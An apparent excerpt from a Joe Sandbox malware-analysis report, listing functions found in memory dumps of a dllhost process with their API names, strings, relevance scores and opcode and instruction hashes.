                                                                                                    • Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                    • String ID: csm$f
                                                                                                    • API String ID: 2395640692-629598281
                                                                                                    • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                                    • Instruction ID: faa2c38257057e3429eba7770ba323e7a5bfe42f2bb76d273cd78d02ebb0895b
                                                                                                    • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                                    • Instruction Fuzzy Hash: 16316732214648A6E714DB31E84C7D9B7A7F7A4B98F058128EE5A07785EB78CA40C704
                                                                                                    Function 000002131118A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                    • Instruction ID: 9c940cf398a5781526f64b4d3b04d50c5733dc3a69371852f0c5da584cfc5a96
                                                                                                    • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                    • Instruction Fuzzy Hash: B2F01271325648B2FF54CB71F88C3E5A762AB68BD0F486039D52F45A64DF6CC698C700
                                                                                                    Function 00000213111851B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2882836952-0
                                                                                                    • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                                    • Instruction ID: 478c71a678fe9999deeb88b6d8a0325ca266820e851439dbc3493ec070345fcd
                                                                                                    • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                                    • Instruction Fuzzy Hash: A402CB32219B8496EBA0CB65F49439EF7A2F3D4794F504125EA8E87B68DFBCC554CB00
                                                                                                    Function 00000213111824DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileType
                                                                                                    • String ID: \\.\pipe\
                                                                                                    • API String ID: 3081899298-91387939
                                                                                                    • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                    • Instruction ID: 3734d04ef3e80a077c70b26b7c3e57fb893fd27910afd06e8f1a9b3db36ebfb4
                                                                                                    • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                    • Instruction Fuzzy Hash: 1F51F732618781A3E636DE39A15C3EAE753F3A5784F248135DD8E03B99DA7DC601CB40
                                                                                                    Function 0000021311181D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocFree
                                                                                                    • String ID:
                                                                                                    • API String ID: 756756679-0
                                                                                                    • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                    • Instruction ID: 69aa7cd462674eaa8afe67f322bac80a6aad927e7f9cb34c978fab9dc4cf1c78
                                                                                                    • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                    • Instruction Fuzzy Hash: D2218133605B9496EB12CF79E4082DAF3A1FB98B94F058131EE8D47B64EE7CC6428700